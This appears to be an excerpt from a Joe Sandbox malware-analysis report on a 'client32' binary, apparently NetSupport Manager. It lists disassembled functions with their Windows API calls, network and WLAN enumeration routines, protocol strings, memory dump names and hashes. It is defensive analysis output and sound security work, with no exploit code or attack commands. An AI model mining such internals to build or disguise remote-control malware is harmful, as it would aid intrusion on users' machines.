                                                                                                • Opcode Fuzzy Hash: c81d25e2e8cb7f75c078c5fd95e92035e2d47ec10419b288dd585f56f01eb885
                                                                                                • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                                Function 69CEFC60 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 1771113911-4289949731
                                                                                                • Opcode ID: a2e9cbf98913b80bd08d6ad44bde7465562a6b09c97ab9735eafdaa345a8e1eb
                                                                                                • Instruction ID: 9fec04819cf2aae502115e393c88708dc85984b5b34edeae31f29b395fbd9af5
                                                                                                • Opcode Fuzzy Hash: a2e9cbf98913b80bd08d6ad44bde7465562a6b09c97ab9735eafdaa345a8e1eb
                                                                                                • Instruction Fuzzy Hash: 5DB16E717001449FEB28CF1CFC91A5EB7A6FB897447244A28F893CB781E734E98197A1
                                                                                                Function 69CF1F90 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 240networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • getpeername.WSOCK32(?,?,?), ref: 69CF2198
                                                                                                • htons.WSOCK32(?), ref: 69CF21A9
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?), ref: 69CF21D9
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?), ref: 69CF220C
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?), ref: 69CF2217
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?), ref: 69CF2227
                                                                                                • std::exception::exception.LIBCMT ref: 69CF226B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF2286
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Exception@8Throw_malloc_memsetgetpeernamehtonsstd::exception::exceptionwsprintf
                                                                                                • String ID: FNAME$FSIZE$LINK$LWT$RESULT$SUB
                                                                                                • API String ID: 205723298-3189277165
                                                                                                • Opcode ID: bee13458596d9e4237e90a4c15ffb2f6fd9868fa33643690235314fecf748693
                                                                                                • Instruction ID: 61f1af8b7a636c517631a9c52b604dd1d9fa2b8e1f6bd50e26497b109e1b5192
                                                                                                • Opcode Fuzzy Hash: bee13458596d9e4237e90a4c15ffb2f6fd9868fa33643690235314fecf748693
                                                                                                • Instruction Fuzzy Hash: 06914AB5C002999FDF50CFA4DD90AAEBBB4FF44308F50857AE609A7640EB305A46CB61
                                                                                                Function 69CF8140 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 147libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$Library$AddressFreeLoadProcwsprintf
                                                                                                • String ID: RAS$%02x%02x%02x%02x%02x%02x$* $3$DEST$Netbios$netapi32.dll
                                                                                                • API String ID: 3525900152-2950743334
                                                                                                • Opcode ID: 106558488552179232bb10a505f8d938a3751ee61cf660859bc7ac35a1dca169
                                                                                                • Instruction ID: 9c641251cf3edf0c44f9d3560adc4f630bc5f1b1f6ee83466711f35b1d37e8a7
                                                                                                • Opcode Fuzzy Hash: 106558488552179232bb10a505f8d938a3751ee61cf660859bc7ac35a1dca169
                                                                                                • Instruction Fuzzy Hash: 3D512770D142685BDF26CB25DC51BDABBF8AF46304F0080E9F98DA7241E6719B89CF24
                                                                                                Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • LoadLibraryA.KERNEL32(wlanapi.dll), ref: 1115B61B
                                                                                                • GetProcAddress.KERNEL32(00000000,WlanOpenHandle,?,?,?,11058627), ref: 1115B634
                                                                                                • GetProcAddress.KERNEL32(?,WlanCloseHandle,?,?,?,11058627), ref: 1115B644
                                                                                                • GetProcAddress.KERNEL32(?,WlanEnumInterfaces,?,?,?,11058627), ref: 1115B654
                                                                                                • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList,?,?,?,11058627), ref: 1115B664
                                                                                                • GetProcAddress.KERNEL32(?,WlanFreeMemory,?,?,?,11058627), ref: 1115B674
                                                                                                • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                                • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                • API String ID: 2439742961-1736626566
                                                                                                • Opcode ID: 2608c12448893da24d69e8b4b9b33c57e694c25a5452fefb97775b225fa14a79
                                                                                                • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                                • Opcode Fuzzy Hash: 2608c12448893da24d69e8b4b9b33c57e694c25a5452fefb97775b225fa14a79
                                                                                                • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                                Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                                • _free.LIBCMT ref: 1112131D
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • _free.LIBCMT ref: 11121333
                                                                                                • _free.LIBCMT ref: 11121348
                                                                                                • GdiFlush.GDI32 ref: 11121350
                                                                                                • _free.LIBCMT ref: 1112135D
                                                                                                • _free.LIBCMT ref: 11121371
                                                                                                • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                                • DeleteObject.GDI32(?), ref: 1112139A
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,021280F8), ref: 111213A4
                                                                                                • DeleteDC.GDI32(?), ref: 111213CB
                                                                                                • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                                • DeleteDC.GDI32(?), ref: 111213EB
                                                                                                • InterlockedDecrement.KERNEL32(111EA9C8,?,?,?,?,?,021280F8), ref: 111213F8
                                                                                                Strings
                                                                                                • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                • String ID: Error deleting membm, e=%d
                                                                                                • API String ID: 3195047866-709490903
                                                                                                • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                                • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                                Function 69CF0F59 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 263COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF0FAD
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1293
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF12E3
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1316
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF132D
                                                                                                • std::exception::exception.LIBCMT ref: 69CF135B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF1376
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                • API String ID: 275297366-914382535
                                                                                                • Opcode ID: 4b2306f60f5fc740bf1ff3eef3d4172e2a1d727ff2e46f580703372a99c14d7b
                                                                                                • Instruction ID: 601bc693f29bdd1152f39ad6527c2caa0520846c4975b91e680bc9801223bf07
                                                                                                • Opcode Fuzzy Hash: 4b2306f60f5fc740bf1ff3eef3d4172e2a1d727ff2e46f580703372a99c14d7b
                                                                                                • Instruction Fuzzy Hash: 7E91B3F5C012599BDF90CFA4AC41AEEB6B4BF0030CF40517AE50AE6601F7354B9ACB56
                                                                                                Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                                • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                                • CreateWindowExA.USER32 ref: 110CF400
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                                • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                • API String ID: 4172769820-2231854162
                                                                                                • Opcode ID: f5576ccba4c09612635a98adb9a4707c3fcf05e1d93d5abc5032e00a4d5d8499
                                                                                                • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                                • Opcode Fuzzy Hash: f5576ccba4c09612635a98adb9a4707c3fcf05e1d93d5abc5032e00a4d5d8499
                                                                                                • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                                Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(0000017D,986DAFD2,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                • _memset.LIBCMT ref: 1110F4C2
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                                • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                                  • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?,?,00000000,110C1126,00000000,00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 11110008
                                                                                                • CloseHandle.KERNEL32(?), ref: 1110F5F5
                                                                                                • _free.LIBCMT ref: 1110F628
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1110F665
                                                                                                • timeEndPeriod.WINMM(00000001), ref: 1110F677
                                                                                                • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,986DAFD2,0000017D,00000001), ref: 1110F681
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                                • String ID: End Record %s$PCIR
                                                                                                • API String ID: 4278564793-2672865668
                                                                                                • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                                • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                                Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F711B
                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                                • wsprintfA.USER32 ref: 110F7235
                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                                • wsprintfA.USER32 ref: 110F7267
                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                                • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                                • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                • API String ID: 856016564-3838485836
                                                                                                • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                                • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                                • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                                • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                                Function 69CE9E20 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                • __wcstoui64.LIBCMT ref: 69CE9EF8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wcstoui64_memset_strncpy
                                                                                                • String ID: 1.0$CMPI$FAILED_REASON$Gateway rejected client connection because licence was exceeded.$Gateway rejected client connection because security check failed.$MAC$MAXPACKET$PROTOCOL_VER$RESULT$SERVER_VERSION$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$strlen(p) == 12
                                                                                                • API String ID: 2670788892-1257448691
